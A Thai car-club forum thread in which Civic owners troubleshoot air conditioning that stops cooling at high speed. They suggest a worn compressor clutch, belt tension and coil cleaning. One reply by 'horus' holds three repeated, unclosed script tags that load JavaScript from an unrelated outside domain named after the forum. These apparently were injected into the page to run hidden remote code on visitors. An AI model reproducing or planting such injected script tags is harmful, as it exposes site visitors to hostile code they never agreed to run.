ตอบ
sittesak


เข้าร่วม: 27 กุมภา 2013
ตอบ: 110

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 104
พุธ, 7 สิงหา 2013 16:41 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
เป็นบ่อยมากๆคับพอความเร็วอยู่ที่ 120 ยังเย็นแต่พอเดินคันเร่งเพิ่ม  แอร์ไม่เย็นเลยทันที่  ต้องปิดทิ้งไว้นานๆถึงกลับมาเย็นอีกครั้ง

ใครที่เคยเป็นอากรนี้แล้วแก้ไขหาย  ช่วยชี้แนะด้วบคับ
Blackhole


ชื่อเล่น: หนุ่ม

เข้าร่วม: 01 มีนา 2013
ตอบ: 351

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 642
ให้คำขอบคุณ: 670

ที่อยู่: สวนผัก 48 ตลิ่งชัน
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 7 สิงหา 2013 17:06 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
ส่วนหนึ่งน่าจะมาจาก ครัชท์คอมแอร์ จับไม่สนิท เนื่องจากการใช้ความเร็วรอบของเครื่องยนต์ที่สูง หากครัชท์คอมแอร์มีสนามแม่เหล็กอ่อน ไม่สามารถจับดูดแผ่นเพลตที่เชื่อมต่อกับแกนเพลาของลูกสูบคอมแอร์ได้แน่น แรงฉุดของสายพานแอร์ ที่รอบเครื่องยนต์สูง จะทำให้แผ่นครัชท์เกิดการหมุนฟรี หรือไม่สามารถทำให้แกนเพลาของคอมแอร์ หมุนตามรอบเครื่องยนต์ได้ อาจจะทำงานบ้างไม่ทำงานบ้าง กล่าวคือทำให้ไม่สามารถอัดน้ำยาเข้าระบบได้ การเกิดความเย็นก็จะไม่มีหรือมีน้อย

ก่อนอื่นลองเปลี่ยนขดลวดฟีลด์คอยของครัขท์คอมแอร์ดู และตรวจสอบเรื่องความตึงของสายพานแอร์ อย่าให้หย่อนเกินไป หรือสายพานคอมแอรืสึกมาก จนเกิดความเลื่อนไม่มี friction สัมผัสกับแนวร่องของร่องสายพานแอร์ที่ตัวคอม ลองตรวจสอบในเบื้องต้นตามนี้ก่อน หากไม่ตรวจสอบแล้วยังไม่ปกติ ก็ต้องตรวจสอบในระบบของแอร์ ไว้ ค่อยกล่าวในคราวหลัง แต่ส่วนมากที่พบก็จะมาจากที่ผมกล่าว จะมีบ้างที่มาจากระบบแอร์......srithanon

ก็อปมาจากมาสด้าครับ
http://www.mazdaclub.net/module_view.php?mod=webboard&fn=view&cid=94359
ได้รับคำขอบคุณจาก: undertaker55  KAATO  sittesak  WarHighways  popza4 
black_boy


ชื่อเล่น: โบ๊ต

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2031

นายทะเบียน
นายทะเบียน

ได้รับคำขอบคุณ: 1969
ให้คำขอบคุณ: 706

ที่อยู่: ES อยู่ไหน ก็ที่นั่นแหล่ะ ที่อยู่ผม
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 7 สิงหา 2013 18:00 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
เคยเป็นครับครัชคอมแอร์สึกจนไม่สามารถจับที่รอบสูงได้ พอจอดหรือขับช้าๆก็จะเย็น

เปลี่ยนครัชประมาณ 1700 ครับ

ปล.อันนี้จาก1 ประสบการณ์ที่เคยเจอ
ได้รับคำขอบคุณจาก: undertaker55  sittesak 
somchai10


เข้าร่วม: 08 มิถุนา 2010
ตอบ: 1663

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 488
ให้คำขอบคุณ: 103
พุธ, 7 สิงหา 2013 18:39 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
Blackhole พิมพ์ว่า:
ส่วนหนึ่งน่าจะมาจาก ครัชท์คอมแอร์ จับไม่สนิท เนื่องจากการใช้ความเร็วรอบของเครื่องยนต์ที่สูง หากครัชท์คอมแอร์มีสนามแม่เหล็กอ่อน ไม่สามารถจับดูดแผ่นเพลตที่เชื่อมต่อกับแกนเพลาของลูกสูบคอมแอร์ได้แน่น แรงฉุดของสายพานแอร์ ที่รอบเครื่องยนต์สูง จะทำให้แผ่นครัชท์เกิดการหมุนฟรี หรือไม่สามารถทำให้แกนเพลาของคอมแอร์ หมุนตามรอบเครื่องยนต์ได้ อาจจะทำงานบ้างไม่ทำงานบ้าง กล่าวคือทำให้ไม่สามารถอัดน้ำยาเข้าระบบได้ การเกิดความเย็นก็จะไม่มีหรือมีน้อย

ก่อนอื่นลองเปลี่ยนขดลวดฟีลด์คอยของครัขท์คอมแอร์ดู และตรวจสอบเรื่องความตึงของสายพานแอร์ อย่าให้หย่อนเกินไป หรือสายพานคอมแอรืสึกมาก จนเกิดความเลื่อนไม่มี friction สัมผัสกับแนวร่องของร่องสายพานแอร์ที่ตัวคอม ลองตรวจสอบในเบื้องต้นตามนี้ก่อน หากไม่ตรวจสอบแล้วยังไม่ปกติ ก็ต้องตรวจสอบในระบบของแอร์ ไว้ ค่อยกล่าวในคราวหลัง แต่ส่วนมากที่พบก็จะมาจากที่ผมกล่าว จะมีบ้างที่มาจากระบบแอร์......srithanon

ก็อปมาจากมาสด้าครับ
http://www.mazdaclub.net/module_view.php?mod=webboard&fn=view&cid=94359




         +1 เสียงครับ
ได้รับคำขอบคุณจาก: sittesak  popza4 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 7 สิงหา 2013 23:21 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
เอาแหวนรองหน้าคลัช ออก ช่วยได้เหมือนกัน แต่ยังไงก็นานไปก็ต้องเปลี่ยน
ได้รับคำขอบคุณจาก: sittesak 
artes


ชื่อเล่น: อาร์ตค๊าฟฟ

เข้าร่วม: 26 กรกฎา 2013
ตอบ: 41

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 43
ให้คำขอบคุณ: 6

ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 8 สิงหา 2013 00:44 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
เก็บ ข้อมูล *****ส่วนของผม ถ้าวิ่ง รอบถึง 2000 พัน ถึงจะเย็น แต่ถ้าจอด ติดไฟแดง ไม่เย็นครับ อยากทราบปัญหาเหมือนกันครับ รบกวนบอกผมทีครับ
ได้รับคำขอบคุณจาก: sittesak 
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 8 สิงหา 2013 06:52 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
ตามข้างบนครับนั่นแหละครับ

ถ้ายังไม่หาย ช่างแอร์เขาก็คงรู้ว่าต้องหาสาเหตุถัดไป คือ ตรวจสอบการรั่วของระบบ
 
ได้รับคำขอบคุณจาก: sittesak 
Blackhole


ชื่อเล่น: หนุ่ม

เข้าร่วม: 01 มีนา 2013
ตอบ: 351

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 642
ให้คำขอบคุณ: 670

ที่อยู่: สวนผัก 48 ตลิ่งชัน
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 8 สิงหา 2013 10:13 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
artes พิมพ์ว่า:
เก็บ ข้อมูล *****ส่วนของผม ถ้าวิ่ง รอบถึง 2000 พัน ถึงจะเย็น แต่ถ้าจอด ติดไฟแดง ไม่เย็นครับ อยากทราบปัญหาเหมือนกันครับ รบกวนบอกผมทีครับ


ล้างคอยล์ร้อนครับ น่าจะช่วยได้....ถ้ายังไม่หาย ก็ล้างคอยล์เย็นอีกอย่าง
ถ้ายังไม่หายอีก ก็อาบน้ำครับ หายร้อน
ได้รับคำขอบคุณจาก: sittesak 
horus


ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ที่อยู่: รามอินทรา / นนทบุรี / ES เมืองทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
พฤหัส, 8 สิงหา 2013 13:06 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
Blackhole พิมพ์ว่า:
artes พิมพ์ว่า:
เก็บ ข้อมูล *****ส่วนของผม ถ้าวิ่ง รอบถึง 2000 พัน ถึงจะเย็น แต่ถ้าจอด ติดไฟแดง ไม่เย็นครับ อยากทราบปัญหาเหมือนกันครับ รบกวนบอกผมทีครับ


ล้างคอยล์ร้อนครับ น่าจะช่วยได้....ถ้ายังไม่หาย ก็ล้างคอยล์เย็นอีกอย่าง
ถ้ายังไม่หายอีก ก็อาบน้ำครับ หายร้อน


<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ..
 
ได้รับคำขอบคุณจาก: sittesak 
donniiez


ชื่อเล่น: ดอน

เข้าร่วม: 24 เมษา 2011
ตอบ: 561

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 502
ให้คำขอบคุณ: 144

ที่อยู่: สะพานใหม่
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 9 สิงหา 2013 00:06 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
วิ่งเร็วแล้วไม่เย็นต้องจอดสักพักถึงเย็น เปิดฝากระโปรงดูครับ น้ำแข็งเกาะท่อแอร์ไหม ถ้าเกาะ ตู้ตันครับล้างก็หาย
ส่วนรถติดไฟแดงไม่เย็นวิ่งแล้วเย็น ตอนติดไฟแดงเร่งเครื่องประมาน 2000 รอบทิ้งไว้แปปนึง เยนไหม ถ้าเยนคลัชไม่จับครับ 
ลองเชคดูคร่าวๆตามนี้ครับ 2 ท่าน ผมเคยเป็นมาแล้ว ทั้ง 2อาการ 
ได้รับคำขอบคุณจาก: popza4 
sittesak


เข้าร่วม: 27 กุมภา 2013
ตอบ: 110

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 104
เสาร์, 10 สิงหา 2013 10:15 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
blackhawkpearl พิมพ์ว่า:
เอาแหวนรองหน้าคลัช ออก ช่วยได้เหมือนกัน แต่ยังไงก็นานไปก็ต้องเปลี่ยน


แหวนตัวไหนคับ
บอกร้านได้ไหม
sittesak


เข้าร่วม: 27 กุมภา 2013
ตอบ: 110

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 104
เสาร์, 10 สิงหา 2013 10:16 - แก้ไขกันอย่างไงคับกับอาการ "ขับเร็วแล้วแอร์ไม่เย็น" ช่วยชี้แนะที่คับ
donniiez พิมพ์ว่า:
วิ่งเร็วแล้วไม่เย็นต้องจอดสักพักถึงเย็น เปิดฝากระโปรงดูครับ น้ำแข็งเกาะท่อแอร์ไหม ถ้าเกาะ ตู้ตันครับล้างก็หาย
ส่วนรถติดไฟแดงไม่เย็นวิ่งแล้วเย็น ตอนติดไฟแดงเร่งเครื่องประมาน 2000 รอบทิ้งไว้แปปนึง เยนไหม ถ้าเยนคลัชไม่จับครับ 
ลองเชคดูคร่าวๆตามนี้ครับ 2 ท่าน ผมเคยเป็นมาแล้ว ทั้ง 2อาการ 




เปิดแล้วไม่มีน้ำแข็งเกาะคับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.